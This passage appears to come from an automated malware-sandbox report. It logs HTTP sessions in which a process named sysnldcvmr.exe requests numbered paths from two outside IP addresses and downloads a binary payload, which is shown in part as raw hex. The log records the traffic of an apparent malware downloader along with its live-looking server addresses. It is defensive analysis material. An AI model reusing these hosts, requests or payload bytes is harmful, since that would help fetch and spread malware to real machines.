Dec 5, 2024 17:33:11.535975933 CET	124	IN	Data Raw: c6 7d 84 30 24 76 89 f0 37 5b fe 25 aa 52 93 09 22 e8 f0 4c 0a d9 9f e6 45 fe cc ed b4 af 8e 4c e4 d6 b7 de ab a2 e5 09 3c 68 a2 d8 37 ae d1 0f 94 d8 79 62 f8 4b 8c 24 6c 8f 02 df 92 3e b4 00 98 f9 87 60 ed 95 84 3f 74 c3 b9 d3 0e 94 6c fb 0c 4c Data Ascii: }0$v7[%R"LEL<h7ybK$l>`?tlL's%[WX,FTjHihQ<Rr
Dec 5, 2024 17:33:11.536894083 CET	1236	IN	Data Raw: 10 0b bc 33 cf fe 47 98 e1 3c 64 34 4c 56 24 40 b9 4d 3c 17 10 a2 d8 0b 9f b2 d8 5f cc ab fa 64 aa 9c 54 88 a4 ff 1a 7c 2c 67 cf e3 e0 2b af cb 15 dc 9b a2 89 55 5b 16 ce 7a 68 a8 5e 16 50 d1 49 01 5f c7 13 c4 77 f4 51 99 76 d4 56 9d a9 73 ae 15 Data Ascii: 3G<d4LV$@M<_dT\|,g+U[zh^PI_wQvVs\|nXaGIr30pZYz]>g13TXX5\Zb@9Ptev@r'r=f:s,84n@E@ uHkL>Dt1
Dec 5, 2024 17:33:11.536978006 CET	1236	IN	Data Raw: d6 d7 c1 91 d0 16 35 39 77 ae 82 49 77 07 87 b0 fe 68 36 42 71 be 4e 2c 6b c5 6b 32 17 90 0c 01 67 95 20 af 14 e6 c5 d8 bb 6c 36 91 6d d0 79 35 10 91 b1 d6 1e ab 2d 36 37 1e f4 c8 88 10 8d 5a 83 93 da c5 27 c1 fe 06 f1 07 bc 4f e2 b2 2b e7 d4 b4 Data Ascii: 59wIwh6BqN,kk2g l6my5-67Z'O+M<U\R,Yn/cXtwl'T-@+RY4jLn$"p$on=POF'H:8{r(vW8^z`'r4Mb&}lF~5/
Dec 5, 2024 17:33:11.536989927 CET	248	IN	Data Raw: bc 0a 03 56 b1 f9 76 e2 09 c5 78 f1 7f 0e 64 6c 58 5c d9 40 f1 30 be 6c da d1 c9 aa 45 fb 15 99 c0 9e 82 9e e0 7f 0b cc 42 e3 17 04 35 60 46 9f 17 d4 a6 85 8b 4d 63 8c b5 2a 43 73 bd 4f 42 aa e1 eb a5 ff d0 05 d3 73 30 ce ed ed 1f 18 60 3a a2 98 Data Ascii: VvxdlX\@0lEB5`FMc*CsOBs0`:R<&^)}ucG9#s[1G3Ml"b5r.,I<JR?8OTv-G9.pThB@r.ptk0Kw8\|D-rf9::oZAz
Dec 5, 2024 17:33:11.537250042 CET	1236	IN	Data Raw: 12 69 74 98 04 43 a2 b8 7f d5 a3 8b b7 37 27 e1 52 0d d4 c4 1c 8d 11 2f 19 a5 98 99 7b e2 e2 f4 ef e1 bc c6 f7 e2 e4 08 bf e2 89 44 f6 5b fd 03 ba d0 20 10 4a ea ee af a6 8b 56 82 31 4b aa 24 0b be 0e 4b a4 bd 2e 4c 4c 4c ca a6 e3 32 97 39 a6 8b Data Ascii: itC7'R/{D[ JV1K$K.LLL296`6.A:#(7c4,?;Q2K^{\|;&e8X]\|k8dE.cse]tawqh%`>;Kb0J)cAeRJR<3L?%?UGDAy
Dec 5, 2024 17:33:11.537318945 CET	1236	IN	Data Raw: d0 2c db 0d c1 73 d0 56 4c 5b 90 be b7 24 2e bd 04 c0 8f f2 8d d4 dc a2 9f d9 d2 b3 af d2 b5 e8 d0 73 4b 79 4f f0 2d 88 46 2c 5b a5 ea 98 d1 92 95 3e b6 7b 77 18 71 4b 59 33 20 47 bd e0 80 0b dc 3c db a7 6b 9c 6c a1 a8 f4 9e 6d 92 7f ba db 91 d9 Data Ascii: ,sVL[$.sKyO-F,[>{wqKY3 G<klmf>z]\5BH.x{o;*5ICB!lEknlR(KI'^7kq1`<vbt0TZ#Ra>5Yr~O}Bs
Dec 5, 2024 17:33:11.537388086 CET	248	IN	Data Raw: 28 3a cc ac 2b 96 97 b1 08 94 9d c6 e2 3a 43 81 30 a7 23 6a 76 82 58 b6 32 96 0e 36 ae 2c e6 c9 cd ed 4e e6 b9 f6 22 74 d6 5e fe 27 da d9 f1 fc a4 9f de f1 cf 4b e1 a7 b5 fd 22 b3 80 fd 19 3a 67 5d 2f 3c 3c 52 ab a7 67 41 13 5e b2 95 e5 28 2d 73 Data Ascii: (:+:C0#jvX26,N"t^'K":g]/<<RgA^(-s%82("tO\|uydR'9)t7ptzqI"N#I]zEw_`B04"eWm9VQJWQ84wZ* '(kSO?KJ8J][J-
Dec 5, 2024 17:33:11.537858963 CET	1236	IN	Data Raw: 7d 28 67 b2 35 31 cd e8 49 09 2a a8 7f 40 bb 75 b4 6e ad fe 3c 0a 84 26 89 76 15 12 72 b4 04 2c 66 31 e4 74 8f 5e d0 a5 c4 84 7d 8f 94 bb 11 ec 05 d7 49 cc bd f9 39 67 d2 4a 86 5d 7a 9c ae 55 3b 2f 15 68 53 e2 2b 20 9c 5c b8 f2 9c f5 d8 bf 81 46 Data Ascii: }(g51I@un<&vr,f1t^}I9gJ]zU;/hS+ \FQ'vo-,1T]'Y5\#;;dZpYQM7#s<Y_-2f?.iAgW%RmmjCGrs?BF4X^
Dec 5, 2024 17:33:11.537955046 CET	1236	IN	Data Raw: 80 29 c3 1b 91 2c 56 75 94 50 da 12 a2 5c 9e 90 1d 9a 9f fe 26 ea a8 1f d1 b3 57 33 8f 35 74 48 82 da 6b 2d ea 8c c4 0a 58 7b 3b f9 a5 b2 68 c8 43 18 f6 b4 6e 69 26 15 28 df fc d4 4f 36 c5 93 ca 6f 8d 58 34 0c f5 53 01 78 2d 10 c6 2d 7c ca 9e 6b Data Ascii: ),VuP\&W35tHk-X{;hCni&(O6oX4Sx--\|kiW'TF;%.ExZ}_`S0q!0Nc9^EySD6`L0Gk{42BCWv6amV_?}"o_w#~_Pf.ym<-#jD*
Dec 5, 2024 17:33:11.658019066 CET	1236	IN	Data Raw: 6d 99 87 9a de 95 6e d2 d5 cc 32 ae ca d7 b3 f6 eb 75 01 11 13 c8 5b 53 fc b7 b1 5f c9 89 fb b6 17 06 f9 3b 07 5a b3 b7 5c 73 8b f3 52 47 83 96 d9 bc 0a b3 37 35 89 38 17 df b7 91 93 b3 36 2d 6a 3d db 8b 22 cc 2d f2 ae 67 c2 2a c9 4a bc f1 70 3c Data Ascii: mn2u[S_;Z\sRG7586-j="-gJp<&]2=.yp0SbdcHqH]T\|1pX3t/I+.?h!7v?NJAE=oaT:O(sRAu P+H~p2.X$I2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.11	49953	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:14.845904112 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:33:16.187849998 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:15 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.11	49963	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:18.346934080 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:33:19.696592093 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:19 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.11	49971	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:21.942837954 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:33:23.261398077 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:23 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.11	49981	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:25.519133091 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:33:26.948590994 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:26 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.11	49991	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:29.168576002 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:33:30.498797894 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:30 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.11	50003	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:33.921327114 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:33:35.287679911 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:35 GMT Content-Type: application/octet-stream Content-Length: 9472 Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT Connection: keep-alive ETag: "674f01b0-2500" Accept-Ranges: bytes Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED] Data Ascii: Eqn7n%v u&PUK:PXwj>?hr"BH+<_i@Ft(sIe0al.BM_$"o665&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b\|HyW9>Sgx%2S\4`zG
Dec 5, 2024 17:33:35.287744045 CET	124	IN	Data Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81 Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw\|1r
Dec 5, 2024 17:33:35.291140079 CET	1236	IN	Data Raw: a4 24 91 bc b1 db 4b dd 2f 2e 0a 15 f6 c5 76 91 95 d9 c2 24 e8 c1 a1 24 33 78 ce da c4 6a 9a 37 c2 47 a9 49 1f 18 c0 90 38 77 03 41 3e 24 f9 f8 aa 36 d3 9d 0d ff c2 f1 93 8a c7 96 ae 86 a0 4e f2 46 6a f5 68 32 6d e0 f3 5b f3 ba db cb 0e cc 3d 0b Data Ascii: $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[A9\'xZLU'0O]f.SHzv_JnUC6C-!-H;DF6($enNQ>
Dec 5, 2024 17:33:35.291172028 CET	1236	IN	Data Raw: 60 33 e4 57 f1 78 d1 30 0a 9b 62 2f 1d 1c 08 c3 a5 22 2e d1 34 87 16 2a 41 c9 4d ee 9b 30 49 1e e8 6a 53 83 23 cc 9c 17 d8 4f f9 27 31 01 56 11 23 a0 23 2b 2e 6a 74 1f 74 73 cb 11 cb c1 2a 0d ec 1a 0e ee 73 8d 1b 70 ac 87 f3 fc 34 46 db 9b d7 c1 Data Ascii: `3Wx0b/".4AM0IjS#O'1V##+.jttssp4F9a0{W{+mF9_X#9`<`811MEECM_bOj2jvv;))z46WF7zcMOYmHJc)6m&%Z'\|:.o85>$
Dec 5, 2024 17:33:35.291183949 CET	248	IN	Data Raw: 10 68 68 88 46 46 6a 78 92 f2 b3 b1 36 e2 3e 60 62 7a b3 1b 8f dd 2b 47 f6 62 06 5f f8 6b dd 8a e1 9d 1a 3a 94 1f 1d ec 45 e3 a2 65 57 a4 05 98 f3 53 49 46 b8 0a 9c 2b d0 1c f8 6e ae b5 e5 cd f6 38 6c 2d 22 6b 9c 11 7a a2 2e d5 54 6f 28 f2 29 3e Data Ascii: hhFFjx6>`bz+Gb_k:EeWSIF+n8l-"kz.To()>H<#DIj$W:J/eU\epgWKc@erY7>(f5a@`/2Bv(M}J^!P8XG+oP,8Jp$U%-I<
Dec 5, 2024 17:33:35.291301966 CET	1236	IN	Data Raw: 01 5e 1e 42 70 f5 61 73 f1 0c 3e fb ed 02 70 e3 f2 8d 7f 63 08 8e 11 34 36 48 68 74 e5 6c fd 21 7b e7 09 bc e5 e6 a4 c2 a6 e9 8a f5 1b 49 0f dc cc 82 ee 89 3a db 91 dc 48 5d c4 98 b8 0a ed b8 9b 4c 28 09 ce cd 2b 86 8b 9d 2d 80 57 c4 60 4b 06 a6 Data Ascii: ^Bpas>pc46Hhtl!{I:H]L(+-W`KkE_P@%))"=$%<b80{`\3@<U/t-%"[-7(*q.S.e\|a_iB>9m2Q\|cjC,uMQ&ez; >}V`?`0
Dec 5, 2024 17:33:35.291368961 CET	1236	IN	Data Raw: 15 9d fe f4 07 05 d4 1f f0 a0 6c d7 0d 39 91 a5 49 3c 8c eb 10 ca 4d 06 b0 60 1b 8d 58 c7 ab 92 c7 6b 55 73 52 ea 55 db d8 37 96 94 06 5a f4 de d8 41 92 1d 88 57 80 f0 71 ad ce 92 66 d8 88 f2 98 f1 66 20 d4 ab ff c3 3c af a6 a0 83 3e b2 ed b3 a0 Data Ascii: l9I<M`XkUsRU7ZAWqff <>j+Sh.Psl)cbF{q<Cj?=~,6,$yZ_74QuGS_C\|Pn-b'npNv:A+[97]Lg!7[,m["*?{\|(\|v
Dec 5, 2024 17:33:35.291393042 CET	248	IN	Data Raw: 08 27 45 cd 18 52 40 e6 c0 c5 d7 9c b3 55 03 87 49 31 c8 3e f3 3c a4 ce 21 1d b9 07 76 a5 4d fa 01 d5 59 74 0e 97 25 b1 17 6a ae 4d 8d a3 26 b7 54 27 30 df 79 e7 77 51 ef 0e e9 db db 06 62 c7 b9 15 b1 b4 6a 0c a6 e2 c5 1e 41 70 6d 8c 37 64 c6 eb Data Ascii: 'ER@UI1><!vMYt%jM&T'0ywQbjApm7d`YA8dFIy{7{,wdFQg7TRorwfw`[q/LC]CmBqbWvI}DNAW[f*cSqZ_hMt1JA:
Dec 5, 2024 17:33:35.293134928 CET	1236	IN	Data Raw: c3 40 7a 9b 27 88 a7 3d f3 4f 76 4f 9d 81 2a b8 bb 78 1e 60 55 87 2d 9c f4 43 a7 94 ea a1 c2 c9 2f b8 1a 96 e8 d8 3d 74 c2 4d 2c e7 ed 9f 87 5a 87 18 a2 55 92 88 6d 32 bc 9e ca 3d fc 86 bc 95 a6 19 f7 67 2c bc a2 27 0b 4e da 6e 9e 27 b8 1d 15 29 Data Ascii: @z'=OvO*x`U-C/=tM,ZUm2=g,'Nn')/C]jmO2qPy,v5yQiQl[x;l@>ULb@7pi.Rxju}Kw(\|JC79dh<>}+4mXHBhQ%
Dec 5, 2024 17:33:35.293194056 CET	1236	IN	Data Raw: 54 04 7d 2a c5 e8 7a 84 17 11 2f 10 d3 cc a0 28 56 de b0 1d 7f e5 62 6e 42 76 ba fa 46 3e c1 2e 67 c3 68 cb 43 43 dc 04 be e4 87 e3 86 cd bd 5c c0 ef 84 63 ee 86 09 76 95 ee 98 48 cd 8c 37 bd fc 9e 5b 38 2d 26 09 9e 8d 78 09 76 22 65 39 fd 91 cb Data Ascii: T}*z/(VbnBvF>.ghCC\cvH7[8-&xv"e9c2M7\|t5s<VUnMi.~_'L@"(?rTb2Ha1&w<+nlm4\h>6?lP~'3O\|DHHojCa->'XcEgPf
